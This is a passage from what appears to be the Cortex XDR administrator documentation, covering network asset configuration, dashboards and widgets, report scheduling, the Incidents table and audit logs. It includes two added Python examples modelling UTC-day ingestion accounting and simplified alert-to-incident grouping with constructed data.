domain names to enable Cortex XDR to analyze, locate, and display assets.

Define IP Address Ranges


STEP 1 | In Cortex XDR, navigate to Assets > Network Configuration > IP Address Ranges.

STEP 2 | Define an IP Address Range.

By default, Cortex XDR creates Private Network ranges that specify reserved, industry-approved ranges.
Private Network ranges are marked with an icon and can only have their name edited.
To Add New Range select either:
• Create New
  • In the Create IP Address Range pop-up, enter the IP address Name and IP Address Range or CIDR
    values.

    You can add a range which is fully contained in an existing range; however, you
    cannot add a new range which partially intersects with another range.

    The range names you define will appear when investigating the network related events within the
    Cortex XDR console.
  • Save your definitions.
• Upload from File
  • In the Upload IP Address Ranges pop-up, drag and drop or search for a CSV file listing the IP
    address ranges. Download example file to view the correct format.
  • Add your list of IP address ranges.

STEP 3 | Review your IP address ranges.

After you have named and defined your IP address ranges, review the following information. The IP
Address Ranges table displays the following fields:
• Range Name—Name of the IP address range you defined.
• First IP Address—First IP address value of the defined range.
• Last IP Address—Last IP address value of the defined range.
• Active Assets—Number of assets located within the defined range that have reported Cortex
  XDR Agent logs or appeared in your Network Firewall Logs.
• Active Managed Assets—Number of assets located within the defined range that have reported Cortex
  XDR Agent logs.
• Modified By—User name of the user who last changed the range.
• Modification Time—Timestamp of when this range was last changed.

STEP 4 | Manage your IP address ranges.

In the IP Address Ranges table, locate your range and select:
• Edit range—Edit the IP address configurations. Changes made will affect the Broker VM Network
  Mapper.
• Delete range—Delete the IP address range.

Define Domain Names


STEP 1 | In Cortex XDR, navigate to Assets > Network Configuration > Internal Domain Suffixes.

STEP 2 | In the Internal Domain Suffixes section, +Add the domain suffix you want to include as part of
your internal network. For example, acme.com.

STEP 3 | Select to add to the Domains List.

Manage Your Network Assets
The Assets page provides a central location from which you can view and investigate information relating to
assets in your network. Using your defined internal network configurations, Broker VM Network Mapper,
Cortex XDR agent, EDR data collected from firewall logs, and logs from third-party vendors, Cortex XDR
is able to aggregate and display a list of all the assets located within your network according to their IP
address.
To easily investigate your assets:

STEP 1 | Navigate to Assets > Asset Management > Assets.

STEP 2 | Filter and review your assets.


By default the Assets table is filtered according to unmanaged assets over the last 7 days. The following
table describes both the default and optional fields in the table, and the network prerequisites required
by Cortex XDR to retrieve the data:

• AGENT ID—ID of the agent installed on the asset. Cortex XDR only displays agents that send EDR data
  captured in the firewall logs.
• AGENT INSTALLED—Whether or not the asset has an agent installed.
• AGENT VERSION—Version of the agent installed on the asset. Cortex XDR only displays agents that send
  EDR data captured in the firewall logs.
• COLLECTOR RUNNING—Whether or not a Pathfinder Data Collector is currently running on the asset.
• FIRST TIME SEEN—Timestamp of when the IP address was first seen in the logs.
• HOST NAME—Host name of the asset, if available. Prerequisites: the asset requires at least one of the
  following:
  • An installed Cortex XDR agent
  • A running Cortex XDR collector
  • A GlobalProtect client 9.1 or a later release, configured to send HIP Match logs
  • Associated DHCP logs covering this asset are sent to Cortex XDR
• IP ADDRESS—IP address related to the last asset associated with it.
• LAST TIME SEEN—Timestamp of when the IP address was last seen in the logs.
• MAC ADDRESS—MAC address of the asset. Prerequisites: the asset requires at least one of the following:
  • An installed Cortex XDR agent
  • A running Cortex XDR collector
  • For Mac endpoints, a GlobalProtect client 9.1 or a later release, configured to send HIP Match logs
  • Associated DHCP logs covering this asset are sent to Cortex XDR
• MAC ADDRESS VENDOR—Vendor name of the MAC address of the asset. Prerequisites: the asset requires
  at least one of the following:
  • An installed Cortex XDR agent
  • A running Cortex XDR collector
  • For Mac endpoints, a GlobalProtect client 9.1 or a later release, configured to send HIP Match logs
  • Associated DHCP logs covering this asset are sent to Cortex XDR
• PLATFORM—Platform running on the asset. Prerequisites: the asset requires at least one of the following:
  • An installed Cortex XDR agent
  • A running Cortex XDR collector
  • A GlobalProtect client 9.1 or a later release, configured to send HIP Match logs
• RANGE NAMES—Name of the IP address range allocated to the IP address.

You can export your filtered results to a TSV file.

STEP 3 | Investigate an asset.


Locate an IP address, right-click and select to:
• Open asset view—Pivot to the Asset View to view insights collected from an endpoint with an agent
  installed.
• Open IP View—Pivot to the IP Address View to view details of the associated IP address from an
  endpoint without an agent installed.

  The default filter in the table shows only non-agent assets.

• View agent details—Pivot to the Endpoints table filtered according to the agent ID. Choose whether
  to open the view in a new tab or the same tab. This option is available only for assets with a Cortex
  XDR agent installed.
• Open in Quick Launcher—Open the Quick Launcher search results for the IP address.
• Remove Collector—Remove the Pathfinder Data Collector. Only available if the collector status is In
  Process.

Monitoring
> Cortex XDR Dashboard
> Monitor Cortex XDR Incidents
> Monitor Administrative Activity
> Monitor Agent Activity
> Monitor Agent Operational Status

Cortex XDR Dashboard
The Dashboard screen is the first page you see in the Cortex XDR app when you log in.

The dashboard is comprised of Dashboard Widgets (2) that summarize information about your endpoints
in graphical or tabular format. You can customize Cortex XDR to display Predefined Dashboards or
create your own custom dashboard using the dashboard builder. You can toggle between your available
dashboards using the dashboard menu (1).
In addition, the dashboard provides a color theme toggle (3) that enables you to switch the interface colors
between light and dark.

Dashboard Widgets
Cortex XDR provides the following list of widgets to help you create dashboards and reports displaying
summarized information about your endpoints.
Cortex XDR sorts widgets in the Cortex XDR app according to the following categories:
• Agent Management Widgets
• Incident Management Widgets
• Investigation Widgets
• User Defined Widgets
• Asset Widgets
• XQL Search
• Custom Widget
• System Monitoring
• Host Insights

Agent Management Widgets
• Agent Content Version Breakdown—Displays the total number of registered Cortex XDR agents and the
  distribution of agents by content update version.
• Agent Status Breakdown—Displays the total number of Cortex XDR agents by the agent status.
• Agent Version Breakdown—Displays the total number of registered Cortex XDR agents and the
  distribution of agents by agent version.
• Number of Installed Agents—Displays a timeline of the number of agents installed on endpoints over the
  last 24 hours, 7 days, or 30 days.
• Operating System Type Distribution—Displays the total number of registered agents and their
  distribution according to the operating system.

Incident Management Widgets
• Incidents By Assignee—Displays the top 10 users that are assigned the highest number of incidents over
  the last 30 days. For each assignee, the widget displays the distribution of aged and open incidents. Aged
  incidents have not been modified in seven days. Select an assignee to open the incidents table filtered to
  display incidents that are assigned to the selected assignee.
• Incidents By Status—Provides a summary of the total current number of open incidents according to
  status. Click a status to open a filtered view of the incidents.
Investigation Widgets
• Data Usage Breakdown—Displays a timeline of the consumption of Cortex XDR data in TB. Hover over
  the graph to see the amount at a specific time.
• Detection By Actions—Displays the top five actions performed on alerts or incidents. In the upper right
  corner:
  • Toggle between alerts and incidents
  • Select to view the number of alerts/incidents per action over the last 24 hours, 7 days, or 30 days
• Detections By Category—Displays the top five categories of alerts or incidents. In the upper right
  corner:
  • Toggle between alerts and incidents
  • Select to view the number of alerts/incidents per category over the last 24 hours, 7 days, or 30 days
• Detection By Source—Displays the top five sources of alerts or incidents. In the upper right corner:
  • Toggle between alerts and incidents
  • Select to view the number of alerts/incidents per source over the last 24 hours, 7 days, or 30 days
• Open Incidents by Severity—Displays the total open incidents over the last 30 days according to
  severity. Select a severity to open a filtered view of incidents by the selected severity.
• Response Action Breakdown—Displays the top response actions taken in the Action Center over the last
  24 hours, 7 days, or 30 days.
• Top Hosts—Displays the top ten hosts with the highest number of incidents in order of severity over the
  last 30 days. Incidents are color-coded: red for high severity and yellow for medium severity. Click a host
  to open a filtered view of all open incidents for the selected host.
• Top Incidents—Displays the top ten current incidents with the highest number of alerts according to
  severity over the last 30 days. Alerts are color-coded: red for high and yellow for medium. Click a severity
  to open a filtered view of all open alerts for the selected incident.
• Total Incidents—Displays a timeline of incidents including the number of aged versus open incidents.
  Aged incidents have not been modified in seven days. Select the time scope in the upper right to view the
  number of open incidents over the last 24 hours, 7 days, or 30 days. Hover over the graph to view the
  number of open incidents on a specific day.

User Defined Widgets
• Free Text—Displays a text box that allows you to insert free text.
• Header—Displays a title containing free text. For example, the name and description of a report or
  dashboard, customer name, tenant ID, or date.

Asset Widgets
• Managed Assets vs Unmanaged Assets—Displays a detailed breakdown of your active managed and
  unmanaged assets.
• Agent Status Breakdown—Displays the total number of Cortex XDR agents by the agent status.
• Agent Version Breakdown—Displays the total number of registered Cortex XDR agents and the
  distribution of agents by agent version.
• Number of Installed Agents—Displays a timeline of the number of agents installed on endpoints over the
  last 24 hours, 7 days, or 30 days.
• Operating System Type Distribution—Displays the total number of registered agents and their
  distribution according to the operating system.

XQL Search
• XQL Query—Displays a visualization of the results of an XQL Search query over the past 24 hours, 7
  days, or 30 days. By default, the query runs every 24 hours. Update Now to rerun the query immediately.
  See the XQL Language Reference for detailed information about creating an XQL Search query.

Custom Widget
• Custom Widget—Displays a visualization of the results of an XQL Search. See the XQL Language
  Reference for detailed information about creating an XQL Search query.

System Monitoring
• Ingestion Rate—Displays the rate at which Cortex XDR consumes data ingested from a specific vendor
  or product over the past 24 hours, 7 days, or 30 days. All ingestion rates are measured in bytes per
  second.
• Daily Consumption—A breakdown comparing the product/vendor consumption versus your allowed daily
  limit over the past 24 hours, displayed in UTC. The daily limit is calculated according to your Cortex XDR
  license type: amount of TB / 30 days.

  If the ingestion rate has exceeded your daily limit, Cortex XDR issues a notification through the
  Notification Center and email. After 3 continuous days of exceeding the ingestion rate, Cortex XDR
  stops ingesting data that exceeds the daily limit.

• Detailed Ingestion—Breakdown of ingestion data per vendor or product over the past 30 days. Filter the
  following information for each source:
  • Product/Vendor—Name of the selected product or vendor.
  • First Seen—Timestamp of when the product/vendor was first ingested.
  • Last Seen—Timestamp of when the product/vendor was last ingested.
  • Last Day Ingested—Amount of data ingested over the past 30 days.
  • Current Day Ingested—Amount of data ingested over the past 24 hours.

Host Insights
(Requires a Cortex XDR Host Insights Add-on)
• CVEs By Severity—Provides a summary of the total number of existing CVEs in your network according
  to critical, high, medium, and low severity. Click a severity to open a filtered view of the CVEs.
• Top CVEs By Affected Endpoints—Displays the top Critical, High, and Medium severity CVEs currently
  existing in your network according to the total number of endpoints affected by each CVE. Click a CVE
  to open a filtered view of all affected endpoints.
• Top Vulnerable Applications—Displays the most vulnerable applications with the highest number of
  Critical, High, and Medium severity CVEs. Cortex XDR calculates the vulnerabilities for different
  application versions running on different operating systems. Click an application to open a filtered view
  of all existing CVEs for the selected application.
• Top Vulnerable Endpoints—Displays the most vulnerable endpoints with the highest number of critical,
  high, and medium CVEs. Click a host to open a filtered view of all existing CVEs for the selected host.
• Vulnerabilities On All Endpoints Over Time—Displays CVEs over time across your network. Select the
  time scope in the upper right to view the number of CVEs over the last 24 hours, 7 days, or 30 days.
  Hover over the graph to view the number of existing CVEs on a specific day.

Manage Your Widget Library


The widget library displays predefined widgets and user-created custom widgets. From the widget library,
you can:
• Create and edit custom widgets based on XQL Search queries.
• Search for custom and predefined widgets.
• Edit existing custom widgets.

STEP 1 | In Cortex XDR, navigate to Reporting > Widget Library.

• Create and edit custom widgets based on XQL Search queries.

1. In the widget menu, Create custom XQL widget.


2. Enter a widget Name and optional Description.
3. Create an XQL query. Select XQL Helper to view XQL search and schema examples.
4. Generate the XQL query to display the search results.

XQL queries generated from the widget library do not appear in the Query Center. The
results are used only for creating the custom widget.
5. In the Widget section, define how you want to visualize the results.
6. After you are happy with the query parameters and visualization definitions, Save widget.
The custom widget appears in the list of existing widgets.
• Search for custom and predefined widgets.

1. Search for a widget or Show widgets according to the type of category.
2. Select a widget type to display the widget graph type and parameters. By default, Cortex XDR
displays the widget with Mock Data. Toggle to display your current Real Data.
• Edit existing custom widgets.
1. Locate a custom widget.
2. Select Update widget ( ) to edit the widget or Delete widget from library.

Editing an existing widget affects all dashboards that include the widget and future
generated reports.

STEP 2 | (Optional) Include the widgets listed in the widget library in your custom dashboards and
reports.

Predefined Dashboards
Cortex XDR comes with predefined dashboards that display widgets tailored to the dashboard type. You
can select any of the predefined dashboards directly from the dashboard menu in Reporting > Dashboard.
You can also select and rename a predefined dashboard in the Dashboard Builder available by clicking +
New Dashboard. The types of dashboards that are available to you depend on your license type but can
include:
• Agent Management Dashboard
• Incident Management Dashboard
• Security Manager Dashboard
• Data Ingestion Dashboard

Agent Management Dashboard

The Agent Management Dashboard displays at-a-glance information about the endpoints and agents in
your deployment.

Support for the Agent Management Dashboard requires either a Cortex XDR Prevent or
Cortex XDR Pro per Endpoint license.

The dashboard consists of the following Dashboard Widgets:
• Agent Status Breakdown
• Agent Content Version Breakdown (Top 5)
• Agent Version Breakdown (Top 5)
• Operating Type Distribution
• Top Hosts (Top 10 | Last 30 days)

Incident Management Dashboard

The Incident Management Dashboard provides a graphical summary of incidents in your environment, with
incidents prioritized and listed by severity, assignee, incident age, and affected hosts.
The dashboard consists of the following Dashboard Widgets:
• Incidents by Assignee (Top 10 | Last 30 days)
• Open Incidents
• Open Incidents By Severity (Last 30 days)
• Top Hosts (Top 10 | Last 30 days)
• Top Incidents (Top 10)
To filter a widget to display only incidents that match incident starring policies, select the star in the right
corner. A purple star indicates that the widget is displaying only starred incidents. The starring filter is
persistent and will continue to show the filtered results until you clear the star.

Security Manager Dashboard

The Security Manager Dashboard widgets display general information about Cortex XDR incidents and
agents.

The Security Manager Dashboard requires either a Cortex XDR Prevent or Cortex XDR Pro
per Endpoint license.

The dashboard consists of the following Dashboard Widgets:
• Agent Status Breakdown
• Agent Version Breakdown (Top 5)
• Incidents by Assignee (Top 10 | Last 30 days)
• Open Incidents By Severity (Last 30 days)
• Top Incidents (Top 10)
• Total Incidents
For incident-related widgets you can also filter the results to display only incidents that match incident
starring policies. To apply the filter, select the star in the right corner of the widget. A purple star indicates
that the widget is displaying only starred incidents. The starring filter is persistent and will continue to show
the filtered results until you clear the star.

Data Ingestion Dashboard

The Data Ingestion dashboard displays an overview and detailed information about the type and amount
of data ingested by Cortex XDR, filtered at different resolutions (for example, Syslog Collector, Check
Point logs, and authentication logs).
The dashboard consists of the following Dashboard Widgets:
• Ingestion Rate—Displays your data ingestion rate, measured in bytes/sec, over the past 24 hours, 7
days, or 30 days, filtered according to the type of product, vendor, or device.
• Daily Consumption—Stacked graphs measuring your daily data consumption, according to either
product, vendor, or device type, versus your daily consumption limit. Each bar indicates a 24 hour range
over the past 14 days. Cortex XDR measures and enforces the 24 hour range according to UTC; however,
the graph displays the 24 hour range according to the selected tenant timezone.
• Detailed Ingestion—Table listing when a product, vendor, or device was first and last seen, and the
amount of data ingested over the last 24 hour range and the current 24 hours. Detailed ingestion for the
current 24 hours is updated in 5 minute intervals.
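The UTC-versus-tenant-timezone point in the Daily Consumption description is easy to misread on the graph: two records that fall on the same local calendar day can belong to two different enforced 24 hour ranges. The following added example (not Cortex XDR code; the ingestion records, the 1 GB limit, and the fixed -08:00 tenant offset are all constructed) buckets records per UTC day the way the limit is enforced, then shows how the same UTC bar is labelled in the tenant timezone and how a local-day total would differ.

```python
"""Model of the Daily Consumption widget's UTC-day accounting.

Added example, not Cortex XDR code. All records, the limit and the tenant
timezone are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone, tzinfo

# Constructed tenant timezone. A deployment would use zoneinfo.ZoneInfo for
# the tenant's named zone; a fixed offset keeps this example self-contained.
TENANT_TZ = timezone(timedelta(hours=-8), "PST")

# Constructed ingestion records: (UTC timestamp, bytes ingested).
# Both fall on Nov 1 in the tenant timezone but on different UTC days.
SAMPLE_RECORDS = [
    (datetime(2020, 11, 1, 23, 30, tzinfo=timezone.utc), 600_000_000),  # 15:30 PST Nov 1
    (datetime(2020, 11, 2, 0, 30, tzinfo=timezone.utc), 500_000_000),   # 16:30 PST Nov 1
]
DAILY_LIMIT_BYTES = 1_000_000_000  # constructed limit


def day_key(ts: datetime, tz: tzinfo) -> str:
    """Calendar day (YYYY-MM-DD) of a timestamp as seen in timezone tz."""
    return ts.astimezone(tz).date().isoformat()


def daily_totals(records, tz: tzinfo) -> dict:
    """Sum bytes per calendar day as seen in timezone tz."""
    totals = defaultdict(int)
    for ts, size in records:
        totals[day_key(ts, tz)] += size
    return dict(sorted(totals.items()))


def enforced_daily_consumption(records, limit_bytes: int) -> dict:
    """Per-UTC-day totals with an over-limit flag: the range the limit is enforced on."""
    return {day: (total, total > limit_bytes)
            for day, total in daily_totals(records, timezone.utc).items()}


def displayed_range(utc_day: str, tz: tzinfo) -> tuple:
    """Start and end of one UTC-day bar as the graph labels it in the tenant timezone."""
    start = datetime.fromisoformat(utc_day).replace(tzinfo=timezone.utc)
    end = start + timedelta(days=1)
    return start.astimezone(tz).isoformat(), end.astimezone(tz).isoformat()


if __name__ == "__main__":
    for day, (total, over) in enforced_daily_consumption(SAMPLE_RECORDS, DAILY_LIMIT_BYTES).items():
        print(day, "(UTC)", total, "over limit" if over else "within limit",
              "displayed as", displayed_range(day, TENANT_TZ))
    # Summed per tenant-local day the same records would appear to exceed the limit.
    print("tenant-local day totals:", daily_totals(SAMPLE_RECORDS, TENANT_TZ))
```

Neither UTC day exceeds the constructed limit, while the tenant-local day total does; when a consumption bar looks wrong, compare it against the UTC range printed by `displayed_range` before raising a ticket.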

Build a Custom Dashboard


To create purposeful dashboards, you must consider the information that you and other analysts find
important to your day-to-day operations. This consideration guides you in building a custom dashboard.
When you create a dashboard, you can select widgets from the widget library and choose their placement
on the dashboard.

STEP 1 | Select Reporting > Dashboards Manager > + New Dashboard.

STEP 2 | Enter a unique Dashboard Name and an optional Description of the dashboard.

STEP 3 | Choose the Dashboard Type.

You can use an existing dashboard as a template, or you can build a new dashboard from scratch.

STEP 4 | Click Next.

STEP 5 | Customize your dashboard.


1. To get a feel for how the data will look, Cortex XDR provides mock data. To see how the dashboard
would look with real data in your environment, you can use the toggle above the dashboard to use
Real Data.
2. Drag and drop widgets from the widget library to their desired position.
3. For agent-related widgets, apply an endpoint scope, if desired.
Applying an endpoint scope restricts the results to only the endpoints that belong to the group.
To apply the scope, select the menu on the top right corner of the widget and then select Groups.
Search for and select one or more endpoint groups for which you want to set the widget scope.
4. For incident-related widgets, select the star to display only incidents that match an incident starring
configuration on your dashboard, if desired. A purple star indicates that the widget is displaying only
starred incidents (see Manage Incident Starring).
5. Repeat the process to continue adding additional widgets to the dashboard. If necessary, you can also
remove unwanted widgets from the dashboard. To remove a widget, select the menu in the top right
corner, and Remove widget.

STEP 6 | When you have finished customizing your dashboard, click Next.

STEP 7 | To set the custom dashboard as your default dashboard when you log in to Cortex XDR,
Define as default dashboard.

STEP 8 | To keep this dashboard visible only for you, select Private.
Otherwise, the dashboard is public and visible to all Cortex XDR app users with the appropriate roles to
manage dashboards.

STEP 9 | Generate your dashboard.

Manage Dashboards
From the Reporting > Dashboards Manager, you can view all custom and default dashboards. From the
Dashboards Manager, you can also delete, edit, duplicate, disable, and perform additional management
actions on your dashboards.
To manage an existing dashboard, right click the dashboard and select the desired action.
• Delete - Permanently delete a dashboard.
• Edit - Edit an existing dashboard. You cannot edit the default dashboards provided by Palo Alto
Networks, but you can save one as a new dashboard.
• Save as new - Duplicate an existing dashboard.
• Disable - Temporarily disable a dashboard. If the dashboard is public, it is also removed for
all users.
• Set as default - Make the dashboard the default dashboard that displays when you (and other users, if
the dashboard is public) log in to Cortex XDR.
• Save as report template - Save the dashboard as a report template.

Run or Schedule Reports


There are two ways to create a report template:
• Run a Report Based on a Dashboard
• Create a Report from Scratch

Run a Report Based on a Dashboard


STEP 1 | Select Reporting > Dashboards Manager.

STEP 2 | Right-click the dashboard from which you want to generate a report, and select Save as report
template.

STEP 3 | Enter a unique Report Name and an optional Description of the report, then Save the
template.

STEP 4 | Select Reporting > Report Templates.

STEP 5 | Run the report.


You can either Generate Report to run the report on-demand, or you can Edit the report template to
define a schedule.

STEP 6 | After your report completes, you can download it from the Reporting > Reports page.

Create a Report from Scratch


STEP 1 | Select Reporting > Report Templates > + New Template.

STEP 2 | Enter a unique Report Name and an optional Description of the report.

STEP 3 | Select the Data Timeframe for your report.


You can choose Last 24H (day), Last 7D (week), Last 1M (month), or you can choose a custom
timeframe.

Custom timeframe is limited to one month.

STEP 4 | Choose the Report Type.


You can use an existing template, or you can build a new report from scratch.

STEP 5 | Click Next.

STEP 6 | Customize your report.


To get a feel for how the data will look, Cortex XDR provides mock data. To see how the report would
look with real data in your environment, you can use the toggle above the report to use Real Data.
Select Preview A4 to view how the report is displayed in an A4 format.
Drag and drop widgets from the widget library to their desired position.
If necessary, remove unwanted widgets from the template. To remove a widget, select the menu in the
top right corner, and select Remove widget.
For incident-related widgets, you can also select the star to include only incidents that match an incident
starring configuration in your report. A purple star indicates that the widget is displaying only starred
incidents.

STEP 7 | When you have finished customizing your report template, click Next.

STEP 8 | If you are ready to run the report, select Generate now.

STEP 9 | To run the report on a regular Schedule, you can specify the time and frequency that Cortex
XDR will run the report.

STEP 10 | Enter an optional Email Distribution or Slack workspace to send a PDF version of your report.
Select Add password for e-mailed report to set a password encryption.

STEP 11 | Save Template.

STEP 12 | After your report completes, you can download it from the Reporting > Reports page.

Monitor Cortex XDR Incidents
The Incidents table lists all incidents in the Cortex XDR app.

An attack can affect several hosts or users and raise different alert types stemming from a single event. All
artifacts, assets, and alerts from a threat event are gathered into an Incident.

The logic by which the Cortex XDR app assigns an alert to an incident is based on a set of rules that take
into account different alert attributes, such as the alert source, type, and time period. The app extracts
the set of artifacts related to the threat event listed in each alert and compares it with the artifacts
appearing in existing alerts in the system. Alerts on the same causality chain are grouped into the same
incident if an open incident already exists; otherwise, the new incoming alert creates a new incident.

The Incidents table displays all incidents, including the incident severity, to enable you to prioritize,
track, and update incidents. For additional insight into the entire scope and cause of an event, you can view
all relevant assets, suspicious artifacts, and alerts within the incident details. You can also track incidents,
document the resolution, and assign analysts to investigate and take remedial action. Select multiple
incidents to take bulk actions on them.
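To make the grouping behaviour concrete, the following added example (not the Cortex XDR app's actual grouping rules, which are not published on this page) models one simplified rule: an incoming alert joins the first open incident that shares an artifact with it, and otherwise opens a new incident. The incident severity, description, and sources follow the field definitions in the table below. The alerts, hashes, and hostnames other than WIN-RN4A1D7IM6L / b_julia (taken from the email example later in this guide) are constructed.

```python
"""Simplified model of alert-to-incident grouping.

Added example, not the Cortex XDR app's grouping rules. All alerts and
artifacts are constructed.
"""
from dataclasses import dataclass, field

SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}


@dataclass(frozen=True)
class Alert:
    alert_id: int
    name: str
    severity: str
    source: str
    host: str
    user: str
    artifacts: frozenset  # hashes, process names, causality ids (constructed)


@dataclass
class Incident:
    incident_id: int
    alerts: list = field(default_factory=list)
    status: str = "New"  # New -> Under Investigation -> Resolved - <reason>

    def artifacts(self) -> set:
        return set().union(*(a.artifacts for a in self.alerts))

    def hosts(self) -> set:
        return {a.host for a in self.alerts}

    def users(self) -> set:
        return {a.user for a in self.alerts}

    def severity(self) -> str:
        # Severity field: the highest alert severity (user override not modelled).
        return max((a.severity for a in self.alerts), key=SEVERITY_RANK.__getitem__)

    def description(self) -> str:
        # Incident Description field: first alert name plus affected host/user or counts.
        first = self.alerts[0]
        if len(self.hosts()) == 1 and len(self.users()) == 1:
            return f"'{first.name}' on host {first.host} by user {first.user}"
        return f"'{first.name}' affecting {len(self.hosts())} hosts and {len(self.users())} users"

    def sources(self) -> set:
        # Incident Sources field: sources that raised High or Medium alerts.
        return {a.source for a in self.alerts if a.severity in ("High", "Medium")}


def assign_alert(incidents: list, alert: Alert) -> Incident:
    """Attach the alert to the first open incident sharing an artifact, else open a new one."""
    for incident in incidents:
        if not incident.status.startswith("Resolved") and incident.artifacts() & alert.artifacts:
            incident.alerts.append(alert)
            return incident
    incident = Incident(incident_id=len(incidents) + 1, alerts=[alert])
    incidents.append(incident)
    return incident


def run_sample() -> list:
    """Feed constructed alerts through the grouping and return the resulting incidents."""
    shared_hash = "sha256:constructed-aaaa"  # constructed artifact shared by alerts 1, 2 and 4
    incidents: list = []
    assign_alert(incidents, Alert(1, "Suspicious Process Creation", "Medium", "XDR Agent",
                                  "WIN-RN4A1D7IM6L", "b_julia", frozenset({shared_hash})))
    assign_alert(incidents, Alert(2, "Credential Access Attempt", "High", "BIOC",
                                  "WIN-FILESRV01", "svc_backup", frozenset({shared_hash, "proc:rundll32"})))
    assign_alert(incidents, Alert(3, "Unrelated Beaconing", "Low", "Analytics",
                                  "LNX-DEV07", "dev_ana", frozenset({"dst:198.51.100.7"})))
    # A resolved incident no longer absorbs alerts: the same artifact opens a new incident.
    incidents[0].status = "Resolved - Threat Handled"
    assign_alert(incidents, Alert(4, "Suspicious Process Creation", "Medium", "XDR Agent",
                                  "WIN-RN4A1D7IM6L", "b_julia", frozenset({shared_hash})))
    return incidents
```

The last step is the practical point for analysts: resolving an incident while its artifacts are still active does not suppress further alerts, it causes a fresh incident with the same artifacts to appear in the table, which is visible in the Creation Time and Incident Sources fields.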
The following table describes both the default and additional optional fields that you can view in the
Incidents table and lists the fields in alphabetical order.

Field Description

Check box to select one or more incidents on which to perform
the following actions.
• Assign incidents to an analyst in bulk
• Change the status of multiple incidents
• Change the severity of multiple incidents

Alerts Breakdown The total number of alerts and number of alerts by severity.

Assignee Email Email address associated with the assigned incident owner.

Assigned To The user to which the incident is assigned. The assignee
tracks which analyst is responsible for investigating the
threat. Incidents that have not been assigned have a status of
Unassigned.

Creation Time The time the first alert was added to a new incident.


Hosts The number of hosts affected by the incident. Right-click
the host count to view the list of hosts grouped by operating
system.

Incident Description The description is generated from the name of the first alert
added to the incident and the affected host and user, or the
number of affected users and hosts.

Incident ID A unique number to identify the incident.

Incident Name A user-defined incident name.

Incident Sources List of sources that raised high and medium severity alerts in
the incident.

Last Updated The last time a user took an action or an alert was added to the
incident.

Resolve Comment The user-added comment when the user changes the incident
status to a Resolved status.

Score Displays the score defined by the incident scoring rule.

Severity The highest severity among the alerts in the incident, or the user-defined severity.

Starred The incident includes alerts that match your incident
prioritization policy. Incidents that have alert matches include
a star by the incident name in the Incident details view and a
value of Yes in this field.

Status Incidents have the status set to New when they are generated.
To begin investigating an incident, set the status to Under
Investigation. The Resolved status is subdivided into resolution
reasons:
• Resolved - Threat Handled
• Resolved - Known Issue
• Resolved - Duplicate Incident
• Resolved - False Positive
• Resolved - Auto Resolve - Auto-resolved by Cortex XDR
when all of the alerts contained in an incident have been
excluded.

Total Alerts The total number of alerts in the incident.

Users Users affected by the alerts in the incident. If more than one
user is affected, click on + <n> more to see the list of all users in
the incident.

From the Incidents page, you can right-click an incident to view the incident, and investigate the related
assets, artifacts, and alerts. For more information see Investigate Incidents.

Monitor Administrative Activity
From > Management Auditing, you can track the status of all administrative and investigative
actions. Cortex XDR stores audit logs for 180 days. Use the page filters to narrow the results or Manage
Columns and Rows to add or remove fields as needed.
To ensure you and your colleagues stay informed about administrative activity, you can Configure
Notification Forwarding to forward your Management Audit log to an email distribution list, Syslog server,
or Slack channel.

The following table describes the default and optional additional fields that you can view in alphabetical
order.

Field Description

Email Email address of the administrative user

Description Descriptive summary of the administrative action

Host Name Name of any relevant affected hosts

ID Unique ID for the action

Result Result of the administrative action: Success, Partial, or Fail.

Subtype Sub category of action

Timestamp Time the action took place

Type Type of activity logged, one of the following:
• Agent Configuration
• Agent Installation
• Alert Exclusions
• Alert Notifications
• Alert Rules
• Api Key
• Authentication—User sessions started, along with the user name that
started the session.

• Broker API
• Broker VM
• Dashboards
• Device Control Permanent Exceptions
• Device Control Profile
• Device Control Temporary Exceptions
• Disk Encryption Profile
• Endpoint Administration
• Endpoint Groups
• Extensions Policy
• Extensions Profiles
• Global Exceptions
• Host Firewall Profile
• Incident Management—Actions taken on incidents and on the assets,
alerts, and artifacts in incidents.
• Ingest Data
• Integrations
• Licensing
• Live Terminal—Remote terminal sessions created and actions taken in the
file manager or task manager, a complete history of commands issued,
their success, and the response.
• Managed Threat Hunting
• MSSP
• Policy & Profiles
• Prevention Policy Rules
• Protection Policy
• Protection Profile
• Public API—Authentication activity using an associated Cortex XDR API
key.
• Query Center
• Remediation
• Reporting
• Response—Remedial actions taken, for example to isolate a host and undo
isolate host, or add file hash signature to block list, or undo add hash to
block list
• Rules
• SaaS Collection
• Script Execution
• Starred Incidents
• Vulnerability Assessment

User Name User who performed the action

Monitor Agent Activity
Viewing agent audit logs requires either a Cortex XDR Prevent or Cortex XDR Pro per
Endpoint license.

The Cortex XDR agent logs entries for events that are monitored by the Cortex XDR agent and reports the
logs back to Cortex XDR hourly. Cortex XDR stores the logs for 180 days. To view the Cortex XDR agent
logs, select > Agent Auditing.

To ensure you and your colleagues stay informed about agent activity, you can Configure Notification
Forwarding to forward your Agent Audit log to an email distribution list, Syslog server, or Slack channel.
You can customize your view of the logs by adding or removing fields to the Agent Audits Table. You
can also filter the page result to narrow down your search. The following table describes the default and
optional fields that you can view in the Cortex XDR Agents Audit Table:

Field Description

Category The Cortex XDR agent logs these endpoint events using one of the following
categories:
• Audit—Successful changes to the agent indicating correct behavior.
• Monitoring—Unsuccessful changes to the agent that may require
administrator intervention.
• Status—Indication of the agent status.

Description Log message that describes the action.

Domain Domain to which the endpoint belongs.

Endpoint ID Unique ID assigned by the Cortex XDR agent.

Endpoint Name Endpoint hostname.

Reason If the action or activity failed, this field indicates the identified cause.

Received Time Date and time when the action was received by the agent and reported back
to Cortex XDR.

Result The result of the action (Success, Fail, or N/A).

Severity Severity associated with the log:

• High
• Medium
• Low
• Informational

Type and Sub-Type Additional classification of the agent log (Type and Sub-Type):
• Installation:
• Install
• Uninstall
• Upgrade
• Policy change:
• Local Configuration Change
• Content Update
• Policy Update
• Process Exception
• Hash Exception
• Agent service:
• Service start (reported only when the agent fails to start and the
RESULT is Fail)
• Service stopped
• Agent modules:
• Module initialization
• Local analysis module
• Local analysis feature extraction
• Agent status:
• Fully protected
• OS incompatible
• Software incompatible
• Kernel driver initialization
• Kernel extension initialization
• Proxy communication
• Quota exceeded
• Minimal content
• Action:
• Scan
• File retrieval
• Terminate process
• Isolate
• Cancel isolation
• Payload execution
• Quarantine
• Restore
• Block IP address
• Unblock IP address


Timestamp Date and time when the action occurred.

XDR Agent Version Version of the Cortex XDR agent running on the endpoint.

